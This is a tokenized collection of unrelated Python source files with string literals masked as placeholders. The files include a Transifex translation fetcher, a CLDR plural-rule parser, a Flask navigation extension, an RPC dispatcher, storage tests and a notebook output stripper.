'<STR_LIT>' </s>
<s> from ConfigParser import ConfigParser , NoOptionError , NoSectionError <EOL> import os <EOL> import sys <EOL> import requests <EOL> API_URL = '<STR_LIT>' <EOL> LANGUAGES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def fetch_po_for ( language , username , password ) : <EOL> print '<STR_LIT>' . format ( language ) <EOL> po_api = '<STR_LIT>' . format ( <EOL> language ) <EOL> po_url = API_URL + po_api <EOL> params = { '<STR_LIT:file>' : '<STR_LIT:1>' } <EOL> r = requests . get ( po_url , auth = ( username , password ) , params = params ) <EOL> if r . status_code == <NUM_LIT:200> : <EOL> r . encoding = '<STR_LIT:utf-8>' <EOL> output_file = os . path . join ( <EOL> here , '<STR_LIT>' , '<STR_LIT>' , language , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( output_file , '<STR_LIT:wb>' ) as out : <EOL> out . write ( r . text . encode ( '<STR_LIT:utf-8>' ) ) <EOL> else : <EOL> print ( '<STR_LIT>' . format ( <EOL> language ) ) <EOL> def get_auth_from_conf ( here ) : <EOL> transifex_conf = os . path . join ( here , '<STR_LIT>' ) <EOL> config = ConfigParser ( ) <EOL> try : <EOL> with open ( transifex_conf , '<STR_LIT:r>' ) as conf : <EOL> config . readfp ( conf ) <EOL> except IOError as ex : <EOL> sys . exit ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( ex ) ) <EOL> try : <EOL> username = config . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> password = config . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> except ( NoOptionError , NoSectionError ) as ex : <EOL> sys . exit ( '<STR_LIT>' . format ( ex ) ) <EOL> return username , password <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> username , password = get_auth_from_conf ( here ) <EOL> for language in LANGUAGES : <EOL> fetch_po_for ( language , username , password ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> _plural_tags = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _fallback_tag = '<STR_LIT>' <EOL> class PluralRule ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , rules ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rules , dict ) : <EOL> rules = rules . items ( ) <EOL> found = set ( ) <EOL> self . abstract = [ ] <EOL> for key , expr in rules : <EOL> if key not in _plural_tags : <EOL> raise ValueError ( '<STR_LIT>' % key ) <EOL> elif key in found : <EOL> raise ValueError ( '<STR_LIT>' % key ) <EOL> found . add ( key ) <EOL> self . abstract . append ( ( key , _Parser ( expr ) . ast ) ) <EOL> def __repr__ ( self ) : <EOL> rules = self . rules <EOL> return '<STR_LIT>' % ( <EOL> type ( self ) . __name__ , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( tag , rules [ tag ] ) for tag in _plural_tags <EOL> if tag in rules ] ) <EOL> ) <EOL> def parse ( cls , rules ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rules , cls ) : <EOL> return rules <EOL> return cls ( rules ) <EOL> parse = classmethod ( parse ) <EOL> def rules ( self ) : <EOL> """<STR_LIT>""" <EOL> _compile = _UnicodeCompiler ( ) . compile <EOL> return dict ( [ ( tag , _compile ( ast ) ) for tag , ast in self . abstract ] ) <EOL> rules = property ( rules , doc = rules . __doc__ ) <EOL> tags = property ( lambda x : frozenset ( [ i [ <NUM_LIT:0> ] for i in x . abstract ] ) , doc = """<STR_LIT>""" ) <EOL> def __getstate__ ( self ) : <EOL> return self . abstract <EOL> def __setstate__ ( self , abstract ) : <EOL> self . abstract = abstract <EOL> def __call__ ( self , n ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _func = to_python ( self ) <EOL> return self . _func ( n ) <EOL> def to_javascript ( rule ) : <EOL> """<STR_LIT>""" <EOL> to_js = _JavaScriptCompiler ( ) . compile <EOL> result = [ '<STR_LIT>' ] <EOL> for tag , ast in PluralRule . parse ( rule ) . abstract : <EOL> result . append ( '<STR_LIT>' % ( to_js ( ast ) , tag ) ) <EOL> result . append ( '<STR_LIT>' % _fallback_tag ) <EOL> return '<STR_LIT>' . join ( result ) <EOL> def to_python ( rule ) : <EOL> """<STR_LIT>""" <EOL> namespace = { <EOL> '<STR_LIT>' : in_range , <EOL> '<STR_LIT>' : within_range , <EOL> '<STR_LIT>' : cldr_modulo <EOL> } <EOL> to_python = _PythonCompiler ( ) . compile <EOL> result = [ '<STR_LIT>' ] <EOL> for tag , ast in PluralRule . parse ( rule ) . abstract : <EOL> result . append ( '<STR_LIT>' % ( to_python ( ast ) , tag ) ) <EOL> result . append ( '<STR_LIT>' % _fallback_tag ) <EOL> exec '<STR_LIT:\n>' . join ( result ) in namespace <EOL> return namespace [ '<STR_LIT>' ] <EOL> def to_gettext ( rule ) : <EOL> """<STR_LIT>""" <EOL> rule = PluralRule . parse ( rule ) <EOL> used_tags = rule . tags | set ( [ _fallback_tag ] ) <EOL> _compile = _GettextCompiler ( ) . compile <EOL> _get_index = [ tag for tag in _plural_tags if tag in used_tags ] . index <EOL> result = [ '<STR_LIT>' % len ( used_tags ) ] <EOL> for tag , ast in rule . abstract : <EOL> result . append ( '<STR_LIT>' % ( _compile ( ast ) , _get_index ( tag ) ) ) <EOL> result . append ( '<STR_LIT>' % _get_index ( _fallback_tag ) ) <EOL> return '<STR_LIT>' . join ( result ) <EOL> def in_range ( num , min , max ) : <EOL> """<STR_LIT>""" <EOL> return num == int ( num ) and within_range ( num , min , max ) <EOL> def within_range ( num , min , max ) : <EOL> """<STR_LIT>""" <EOL> return num >= min and num <= max <EOL> def cldr_modulo ( a , b ) : <EOL> """<STR_LIT>""" <EOL> reverse = <NUM_LIT:0> <EOL> if a < <NUM_LIT:0> : <EOL> a *= - <NUM_LIT:1> <EOL> reverse = <NUM_LIT:1> <EOL> if b < <NUM_LIT:0> : <EOL> b *= - <NUM_LIT:1> <EOL> rv = a % b <EOL> if reverse : <EOL> rv *= - <NUM_LIT:1> <EOL> return rv <EOL> class RuleError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class _Parser ( object ) : <EOL> """<STR_LIT>""" <EOL> _rules = [ <EOL> ( None , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:value>' , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , re . compile ( r'<STR_LIT>' ) ) <EOL> ] <EOL> def __init__ ( self , string ) : <EOL> string = string . lower ( ) <EOL> result = [ ] <EOL> pos = <NUM_LIT:0> <EOL> end = len ( string ) <EOL> while pos < end : <EOL> for tok , rule in self . _rules : <EOL> match = rule . match ( string , pos ) <EOL> if match is not None : <EOL> pos = match . end ( ) <EOL> if tok : <EOL> result . append ( ( tok , match . group ( ) ) ) <EOL> break <EOL> else : <EOL> raise RuleError ( '<STR_LIT>' <EOL> '<STR_LIT>' % string [ pos ] ) <EOL> self . tokens = result [ : : - <NUM_LIT:1> ] <EOL> self . ast = self . condition ( ) <EOL> if self . tokens : <EOL> raise RuleError ( '<STR_LIT>' % <EOL> self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> def test ( self , type , value = None ) : <EOL> return self . tokens and self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] == type and ( value is None or self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] == value ) <EOL> def skip ( self , type , value = None ) : <EOL> if self . test ( type , value ) : <EOL> return self . tokens . pop ( ) <EOL> def expect ( self , type , value = None , term = None ) : <EOL> token = self . skip ( type , value ) <EOL> if token is not None : <EOL> return token <EOL> if term is None : <EOL> term = repr ( value is None and type or value ) <EOL> if not self . tokens : <EOL> raise RuleError ( '<STR_LIT>' % term ) <EOL> raise RuleError ( '<STR_LIT>' % ( term , self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) ) <EOL> def condition ( self ) : <EOL> op = self . and_condition ( ) <EOL> while self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' , ( op , self . and_condition ( ) ) <EOL> return op <EOL> def and_condition ( self ) : <EOL> op = self . relation ( ) <EOL> while self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' , ( op , self . relation ( ) ) <EOL> return op <EOL> def relation ( self ) : <EOL> left = self . expr ( ) <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . skip ( '<STR_LIT>' , '<STR_LIT>' ) and '<STR_LIT>' or '<STR_LIT>' , ( left , self . value ( ) ) <EOL> negated = self . skip ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> method = '<STR_LIT>' <EOL> else : <EOL> self . expect ( '<STR_LIT>' , '<STR_LIT>' , term = "<STR_LIT>" ) <EOL> rv = '<STR_LIT>' , ( method , left , self . range ( ) ) <EOL> if negated : <EOL> rv = '<STR_LIT>' , ( rv , ) <EOL> return rv <EOL> def range ( self ) : <EOL> left = self . value ( ) <EOL> self . expect ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' , ( left , self . value ( ) ) <EOL> def expr ( self ) : <EOL> self . expect ( '<STR_LIT>' , '<STR_LIT:n>' ) <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' , ( ( '<STR_LIT:n>' , ( ) ) , self . value ( ) ) <EOL> return '<STR_LIT:n>' , ( ) <EOL> def value ( self ) : <EOL> return '<STR_LIT:value>' , ( int ( self . expect ( '<STR_LIT:value>' ) [ <NUM_LIT:1> ] ) , ) <EOL> def _binary_compiler ( tmpl ) : <EOL> """<STR_LIT>""" <EOL> return lambda self , l , r : tmpl % ( self . compile ( l ) , self . compile ( r ) ) <EOL> def _unary_compiler ( tmpl ) : <EOL> """<STR_LIT>""" <EOL> return lambda self , x : tmpl % self . compile ( x ) <EOL> class _Compiler ( object ) : <EOL> """<STR_LIT>""" <EOL> def compile ( self , ( op , args ) ) : <EOL> return getattr ( self , '<STR_LIT>' + op ) ( * args ) <EOL> compile_n = lambda x : '<STR_LIT:n>' <EOL> compile_value = lambda x , v : str ( v ) <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_not = _unary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_is = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_isnot = _binary_compiler ( '<STR_LIT>' ) <EOL> def compile_relation ( self , method , expr , range ) : <EOL> range = '<STR_LIT>' % tuple ( map ( self . compile , range [ <NUM_LIT:1> ] ) ) <EOL> return '<STR_LIT>' % ( method . upper ( ) , self . compile ( expr ) , range ) <EOL> class _PythonCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_not = _unary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> class _GettextCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> def compile_relation ( self , method , expr , range ) : <EOL> expr = self . compile ( expr ) <EOL> min , max = map ( self . compile , range [ <NUM_LIT:1> ] ) <EOL> return '<STR_LIT>' % ( expr , min , expr , max ) <EOL> class _JavaScriptCompiler ( _GettextCompiler ) : <EOL> """<STR_LIT>""" <EOL> def compile_relation ( self , method , expr , range ) : <EOL> code = _GettextCompiler . compile_relation ( self , method , expr , range ) <EOL> if method == '<STR_LIT>' : <EOL> expr = self . compile ( expr ) <EOL> code = '<STR_LIT>' % ( expr , expr , code ) <EOL> return code <EOL> class _UnicodeCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> compile_is = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_isnot = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> def compile_not ( self , relation ) : <EOL> return self . compile_relation ( negated = True , * relation [ <NUM_LIT:1> ] ) <EOL> def compile_relation ( self , method , expr , range , negated = False ) : <EOL> return '<STR_LIT>' % ( <EOL> self . compile ( expr ) , negated and '<STR_LIT>' or '<STR_LIT>' , <EOL> method , '<STR_LIT>' % tuple ( map ( self . compile , range [ <NUM_LIT:1> ] ) ) <EOL> ) </s>
<s> def test_package_importable ( ) : <EOL> import flask_appconfig </s>
<s> import collections <EOL> from importlib import import_module <EOL> import re <EOL> def register_renderer ( app , id , renderer , force = True ) : <EOL> """<STR_LIT>""" <EOL> renderers = app . extensions . setdefault ( '<STR_LIT>' , { } ) <EOL> if force : <EOL> renderers [ id ] = renderer <EOL> else : <EOL> renderers . setdefault ( id , renderer ) <EOL> def get_renderer ( app , id ) : <EOL> """<STR_LIT>""" <EOL> renderer = app . extensions . get ( '<STR_LIT>' , { } ) [ id ] <EOL> if isinstance ( renderer , tuple ) : <EOL> mod_name , cls_name = renderer <EOL> mod = import_module ( mod_name ) <EOL> cls = mod <EOL> for name in cls_name . split ( '<STR_LIT:.>' ) : <EOL> cls = getattr ( cls , name ) <EOL> return cls <EOL> return renderer <EOL> class NavbarRenderingError ( Exception ) : <EOL> pass <EOL> class ElementRegistry ( collections . MutableMapping ) : <EOL> def __init__ ( self ) : <EOL> self . _elems = { } <EOL> def __getitem__ ( self , key ) : <EOL> item = self . _elems [ key ] <EOL> if callable ( item ) : <EOL> try : <EOL> return item ( ) <EOL> except Exception as e : <EOL> raise NavbarRenderingError ( <EOL> '<STR_LIT>' <EOL> . format ( e ) ) <EOL> return item <EOL> def __setitem__ ( self , key , value ) : <EOL> self . _elems [ key ] = value <EOL> def __delitem__ ( self , key ) : <EOL> del self . _elems [ key ] <EOL> def __iter__ ( self ) : <EOL> for key in self . _elems . keys ( ) : <EOL> return self [ key ] <EOL> def __len__ ( self ) : <EOL> return len ( self . _elems ) <EOL> class Nav ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app = None ) : <EOL> self . elems = ElementRegistry ( ) <EOL> simple = __name__ + '<STR_LIT>' , '<STR_LIT>' <EOL> self . _renderers = [ <EOL> ( '<STR_LIT>' , simple ) , <EOL> ( None , simple , False ) , <EOL> ] <EOL> if app : <EOL> self . init_app ( app ) <EOL> def init_app ( self , app ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . extensions = { } <EOL> app . extensions [ '<STR_LIT>' ] = self <EOL> app . add_template_global ( self . elems , '<STR_LIT>' ) <EOL> for args in self . _renderers : <EOL> register_renderer ( app , * args ) <EOL> def navigation ( self , id = None ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( f ) : <EOL> self . register_element ( id or f . __name__ , f ) <EOL> return f <EOL> return wrapper <EOL> def register_element ( self , id , elem ) : <EOL> """<STR_LIT>""" <EOL> self . elems [ id ] = elem <EOL> def renderer ( self , id = None , force = True ) : <EOL> """<STR_LIT>""" <EOL> def _ ( cls ) : <EOL> name = cls . __name__ <EOL> sn = name [ <NUM_LIT:0> ] + re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , name [ <NUM_LIT:1> : ] ) <EOL> self . _renderers . append ( ( id or sn . lower ( ) , cls , force ) ) <EOL> return cls <EOL> return _ </s>
<s> import os <EOL> from tempdir import TempDir <EOL> import pytest <EOL> boto = pytest . importorskip ( '<STR_LIT>' ) <EOL> from simplekv . net . botostore import BotoStore <EOL> from simplekv . _compat import BytesIO <EOL> from basic_store import BasicStore <EOL> from url_store import UrlStore <EOL> from bucket_manager import boto_credentials , boto_bucket <EOL> @ pytest . fixture ( params = boto_credentials , <EOL> ids = [ c [ '<STR_LIT>' ] for c in boto_credentials ] ) <EOL> def credentials ( request ) : <EOL> return request . param <EOL> @ pytest . yield_fixture ( ) <EOL> def bucket ( credentials ) : <EOL> with boto_bucket ( ** credentials ) as bucket : <EOL> yield bucket <EOL> class TestBotoStorage ( BasicStore , UrlStore ) : <EOL> @ pytest . fixture ( params = [ True , False ] ) <EOL> def reduced_redundancy ( self , request ) : <EOL> return request . param <EOL> @ pytest . fixture <EOL> def storage_class ( self , reduced_redundancy ) : <EOL> return '<STR_LIT>' if reduced_redundancy else '<STR_LIT>' <EOL> @ pytest . fixture ( params = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def prefix ( self , request ) : <EOL> return request . param <EOL> @ pytest . fixture <EOL> def store ( self , bucket , prefix , reduced_redundancy ) : <EOL> return BotoStore ( bucket , prefix , reduced_redundancy = reduced_redundancy ) <EOL> def test_get_filename_nonexistant ( self , store , key ) : <EOL> with TempDir ( ) as tmpdir : <EOL> with pytest . raises ( KeyError ) : <EOL> store . get_file ( key , os . path . join ( tmpdir , '<STR_LIT:a>' ) ) <EOL> def test_key_error_on_nonexistant_get_filename ( self , store , key ) : <EOL> with TempDir ( ) as tmpdir : <EOL> with pytest . raises ( KeyError ) : <EOL> store . get_file ( key , os . path . join ( tmpdir , '<STR_LIT:a>' ) ) <EOL> def test_storage_class_put ( <EOL> self , store , prefix , key , value , storage_class , bucket <EOL> ) : <EOL> store . put ( key , value ) <EOL> keyname = prefix + key <EOL> if storage_class != '<STR_LIT>' : <EOL> pytest . xfail ( '<STR_LIT>' ) <EOL> assert bucket . lookup ( keyname ) . storage_class == storage_class <EOL> def test_storage_class_putfile ( <EOL> self , store , prefix , key , value , storage_class , bucket <EOL> ) : <EOL> store . put_file ( key , BytesIO ( value ) ) <EOL> keyname = prefix + key <EOL> if storage_class != '<STR_LIT>' : <EOL> pytest . xfail ( '<STR_LIT>' ) <EOL> assert bucket . lookup ( keyname ) . storage_class == storage_class </s>
<s> import six <EOL> import inspect <EOL> from . . exc import * <EOL> def public ( name = None ) : <EOL> """<STR_LIT>""" <EOL> if callable ( name ) : <EOL> f = name <EOL> f . _rpc_public_name = f . __name__ <EOL> return f <EOL> def _ ( f ) : <EOL> f . _rpc_public_name = name or f . __name__ <EOL> return f <EOL> return _ <EOL> class RPCDispatcher ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . method_map = { } <EOL> self . subdispatchers = { } <EOL> def add_subdispatch ( self , dispatcher , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . subdispatchers . setdefault ( prefix , [ ] ) . append ( dispatcher ) <EOL> def add_method ( self , f , name = None ) : <EOL> """<STR_LIT>""" <EOL> assert callable ( f ) , "<STR_LIT>" <EOL> if not name : <EOL> name = f . __name__ <EOL> if name in self . method_map : <EOL> raise RPCError ( '<STR_LIT>' ) <EOL> self . method_map [ name ] = f <EOL> def dispatch ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( request , '<STR_LIT>' ) : <EOL> results = [ self . _dispatch ( req ) for req in request ] <EOL> response = request . create_batch_response ( ) <EOL> if response != None : <EOL> response . extend ( results ) <EOL> return response <EOL> else : <EOL> return self . _dispatch ( request ) <EOL> def _dispatch ( self , request ) : <EOL> try : <EOL> try : <EOL> method = self . get_method ( request . method ) <EOL> except KeyError as e : <EOL> return request . error_respond ( MethodNotFoundError ( e ) ) <EOL> try : <EOL> result = method ( * request . args , ** request . kwargs ) <EOL> except Exception as e : <EOL> return request . error_respond ( e ) <EOL> return request . respond ( result ) <EOL> except Exception as e : <EOL> return request . error_respond ( ServerError ( ) ) <EOL> def get_method ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name in self . method_map : <EOL> return self . method_map [ name ] <EOL> for prefix , subdispatchers in six . iteritems ( self . subdispatchers ) : <EOL> if name . startswith ( prefix ) : <EOL> for sd in subdispatchers : <EOL> try : <EOL> return sd . get_method ( name [ len ( prefix ) : ] ) <EOL> except KeyError : <EOL> pass <EOL> raise KeyError ( name ) <EOL> def public ( self , name = None ) : <EOL> """<STR_LIT>""" <EOL> if callable ( name ) : <EOL> self . add_method ( name ) <EOL> return name <EOL> def _ ( f ) : <EOL> self . add_method ( f , name = name ) <EOL> return f <EOL> return _ <EOL> def register_instance ( self , obj , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> dispatch = self . __class__ ( ) <EOL> for name , f in inspect . getmembers ( <EOL> obj , lambda f : callable ( f ) and hasattr ( f , '<STR_LIT>' ) <EOL> ) : <EOL> dispatch . add_method ( f , f . _rpc_public_name ) <EOL> self . add_subdispatch ( dispatch , prefix ) </s>
<s> from unleash import issues , info , log <EOL> PLUGIN_NAME = '<STR_LIT>' <EOL> PLUGIN_DEPENDS = [ '<STR_LIT>' ] <EOL> _PY2_CLASSIFIER = '<STR_LIT>' <EOL> _PY3_CLASSIFIER = '<STR_LIT>' <EOL> def lint_release ( ) : <EOL> log . info ( '<STR_LIT>' ) <EOL> cs = info [ '<STR_LIT>' ] . classifiers <EOL> if not cs : <EOL> issues . warn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> else : <EOL> if not _PY2_CLASSIFIER in cs and not _PY3_CLASSIFIER in cs : <EOL> issues . warn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> import json <EOL> import yaml <EOL> import sys <EOL> def main ( argv ) : <EOL> if len ( argv ) < <NUM_LIT:2> : <EOL> sys . stderr . write ( '<STR_LIT>' % argv [ <NUM_LIT:0> ] ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> with open ( argv [ <NUM_LIT:1> ] ) as yaml_input : <EOL> data = yaml . safe_load ( yaml_input ) <EOL> if '<STR_LIT>' in data : <EOL> del data [ '<STR_LIT>' ] <EOL> print json . dumps ( data , indent = <NUM_LIT:2> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( sys . argv ) </s>
<s> import json <EOL> import os <EOL> import unittest <EOL> import vm_images <EOL> class ImageShortNameToUrlTest ( unittest . TestCase ) : <EOL> def projectImageToUrl ( self , project , image ) : <EOL> url_fmt = '<STR_LIT>' <EOL> return url_fmt % { <EOL> '<STR_LIT>' : project , <EOL> '<STR_LIT:image>' : image , <EOL> } <EOL> def testDirectReferenceImages ( self ) : <EOL> for project , data in vm_images . PROJECT_IMAGES . iteritems ( ) : <EOL> for image in data [ '<STR_LIT>' ] : <EOL> self . assertEqual ( <EOL> self . projectImageToUrl ( project , image ) , <EOL> vm_images . ImageShortNameToUrl ( image ) ) <EOL> def testPseudoImages ( self ) : <EOL> for project , data in vm_images . PROJECT_IMAGES . iteritems ( ) : <EOL> if not '<STR_LIT>' in data : <EOL> continue <EOL> for pseudo in data [ '<STR_LIT>' ] : <EOL> self . assertEqual ( <EOL> self . projectImageToUrl ( project , data [ '<STR_LIT>' ] [ pseudo ] ) , <EOL> vm_images . ImageShortNameToUrl ( pseudo ) ) <EOL> def testInvalid ( self ) : <EOL> self . assertRaises ( <EOL> vm_images . InvalidImageShortName , <EOL> vm_images . ImageShortNameToUrl , <EOL> '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from django . http import HttpResponse <EOL> def home ( request ) : <EOL> return HttpResponse ( '<STR_LIT:OK>' ) </s>
<s> import unittest <EOL> import shutil <EOL> import os <EOL> from angular_scaffold . management . commands . helpers . _generate_assets import generate_assets <EOL> from angular_scaffold . management . commands . helpers . _generate_debugger import generate_debugger <EOL> class GenerateDebuggerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . BASE_DIR = os . path . dirname ( __file__ ) <EOL> if os . path . exists ( os . path . join ( self . BASE_DIR , '<STR_LIT>' ) ) : <EOL> shutil . rmtree ( os . path . join ( self . BASE_DIR , '<STR_LIT>' ) ) <EOL> generate_assets ( self . BASE_DIR , '<STR_LIT>' ) <EOL> def test_debugger ( self ) : <EOL> generate_debugger ( self . BASE_DIR , '<STR_LIT>' ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( self . BASE_DIR , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( self . BASE_DIR , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> def tearDown ( self ) : <EOL> shutil . rmtree ( os . path . join ( self . BASE_DIR , '<STR_LIT>' ) ) </s>
<s> from box import BoundingBox , FloatBox <EOL> from entity import Entity , TileEntity <EOL> from faces import faceDirections , FaceXDecreasing , FaceXIncreasing , FaceYDecreasing , FaceYIncreasing , FaceZDecreasing , FaceZIncreasing , MaxDirections <EOL> from indev import MCIndevLevel <EOL> from infiniteworld import ChunkedLevelMixin , AnvilChunk , MCAlphaDimension , MCInfdevOldLevel , ZeroChunk <EOL> import items <EOL> from javalevel import MCJavaLevel <EOL> from level import ChunkBase , computeChunkHeightMap , EntityLevel , FakeChunk , LightedChunk , MCLevel <EOL> from materials import alphaMaterials , classicMaterials , indevMaterials , MCMaterials , namedMaterials , pocketMaterials <EOL> from mclevelbase import ChunkNotPresent , saveFileDir , minecraftDir , PlayerNotFound <EOL> from mclevel import fromFile , loadWorld , loadWorldNumber <EOL> from nbt import load , gunzip , TAG_Byte , TAG_Byte_Array , TAG_Compound , TAG_Double , TAG_Float , TAG_Int , TAG_Int_Array , TAG_List , TAG_Long , TAG_Short , TAG_String <EOL> import pocket <EOL> from schematic import INVEditChest , MCSchematic , ZipSchematic </s>
<s> import unittest <EOL> import numpy <EOL> from templevel import TempLevel <EOL> __author__ = '<STR_LIT>' <EOL> class TestPocket ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . level = TempLevel ( "<STR_LIT>" ) <EOL> self . alphalevel = TempLevel ( "<STR_LIT>" ) <EOL> def testPocket ( self ) : <EOL> level = self . level . level <EOL> print "<STR_LIT>" , len ( level . allChunks ) <EOL> chunk = level . getChunk ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> a = numpy . array ( chunk . SkyLight ) <EOL> chunk . dirty = True <EOL> chunk . needsLighting = True <EOL> level . generateLights ( ) <EOL> level . saveInPlace ( ) <EOL> assert ( a == chunk . SkyLight ) . all ( ) </s>
<s> from setuptools import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> zip_safe = False ) </s>
<s> import sys <EOL> version = None <EOL> debug = None <EOL> debug = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if debug : <EOL> debug . write ( "<STR_LIT>" ) <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:2>' : <EOL> reload ( sys ) <EOL> sys . setdefaultencoding ( '<STR_LIT:utf8>' ) <EOL> try : <EOL> from jupyter_nbformat import reads , write <EOL> except ImportError : <EOL> try : <EOL> from IPython . nbformat import reads , write <EOL> except ImportError : <EOL> from IPython . nbformat . current import reads , write <EOL> version = '<STR_LIT>' <EOL> to_parse = sys . stdin . read ( ) <EOL> if not version : <EOL> import json <EOL> json_in = json . loads ( to_parse ) <EOL> version = json_in [ '<STR_LIT>' ] <EOL> if debug : <EOL> debug . write ( "<STR_LIT>" % ( version ) ) <EOL> json_in = reads ( to_parse , version ) <EOL> if hasattr ( json_in , '<STR_LIT>' ) : <EOL> sheets = json_in . worksheets <EOL> else : <EOL> sheets = [ json_in ] <EOL> for sheet in sheets : <EOL> for cell in sheet . cells : <EOL> for field in ( "<STR_LIT>" , ) : <EOL> if field in cell : <EOL> if debug : <EOL> debug . write ( "<STR_LIT>" % ( field , cell [ field ] ) ) <EOL> cell [ field ] = [ ] <EOL> for field in ( "<STR_LIT>" , "<STR_LIT>" , ) : <EOL> if field in cell : <EOL> del cell [ field ] <EOL> for field in ( "<STR_LIT>" , ) : <EOL> if field in cell : <EOL> cell [ field ] = None <EOL> if '<STR_LIT>' in json_in . metadata : <EOL> json_in . metadata [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> write ( json_in , sys . stdout , version ) <EOL> if debug : <EOL> write ( json_in , debug , version ) <EOL> debug . write ( "<STR_LIT>" % ( json_in ) ) <EOL> debug . write ( "<STR_LIT>" ) <EOL> if debug : <EOL> debug . close ( ) <EOL> exit ( <NUM_LIT:0> ) </s>
